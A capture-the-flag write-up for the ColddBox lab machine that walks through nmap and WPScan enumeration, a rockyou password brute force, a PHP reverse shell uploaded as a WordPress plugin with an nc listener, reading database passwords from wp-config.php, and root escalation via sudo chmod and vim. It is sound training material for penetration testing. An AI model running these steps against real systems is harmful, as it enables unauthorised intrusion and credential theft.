Write-up

Step-by-step guide on the approach taken to pwn the machine.

Objectives

The objective is to capture both the user and root flags, demonstrating a complete system compromise.

Reconnaissance

We start by performing a port scan using Nmap:

sudo nmap -sCV -F -T5 <url>

We can see that WordPress 4.1.31 is running on port 80.

Using WPScan to enumerate users:

wpscan --url http://10.10.70.7 --enumerate u

We find the following usernames: hugo, c0ldd, and phillip.

Next, we perform a brute-force attack with WPScan:

wpscan --url http://10.10.70.7/ --usernames hugo,c0ldd,phillip --passwords /usr/share/wordlists/rockyou.txt

After a few attempts, we successfully obtain the password for the user c0ldd.

Gaining a Shell

Now, we access the WordPress admin panel and go to the Plugins section to manually upload a plugin.

We upload a plugin that contains a reverse shell script, such as the PentestMonkey PHP reverse shell, edited with our IP and port values.

Once uploaded, we access it via:

http://<url>/wp-content/uploads/<year>/<month>/

Before executing the reverse shell, we set up a listener on our machine:

nc -lnvp <port>

Then, we trigger the uploaded script to receive the shell.

To upgrade the shell, we use:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Running whoami, we confirm we are www-data.

Our next step is to find the user flag:

find / -type f -name "user.txt" 2>/dev/null

However, we can't read the file due to permission restrictions, so we need access to the c0ldd user.

We check the WordPress config file for database credentials:

cat /var/www/html/wp-config.php | grep "DB_PASSWORD"

We retrieve the password for c0ldd.

Then we switch user:

su c0ldd

Now, we can successfully read the user.txt flag. (If we decode it using base64 --decode, we get a congratulatory message.)

Next, we look for root.txt:

find / -type f -name "root.txt" 2>/dev/null

Again, we lack permission to read the file — so we need to escalate privileges to root.

Privilege Escalation

Using sudo -l, we see that we can run vim, chmod, and ftp as root. The easiest escalation path is using chmod:

sudo chmod 777 -R /root
cat /root/root.txt

As an alternative method, we can escalate using vim:

sudo vim -c ':!/bin/sh'

And that's it — machine completed.

PreviousColddBoxNextTechnical Report

Last updated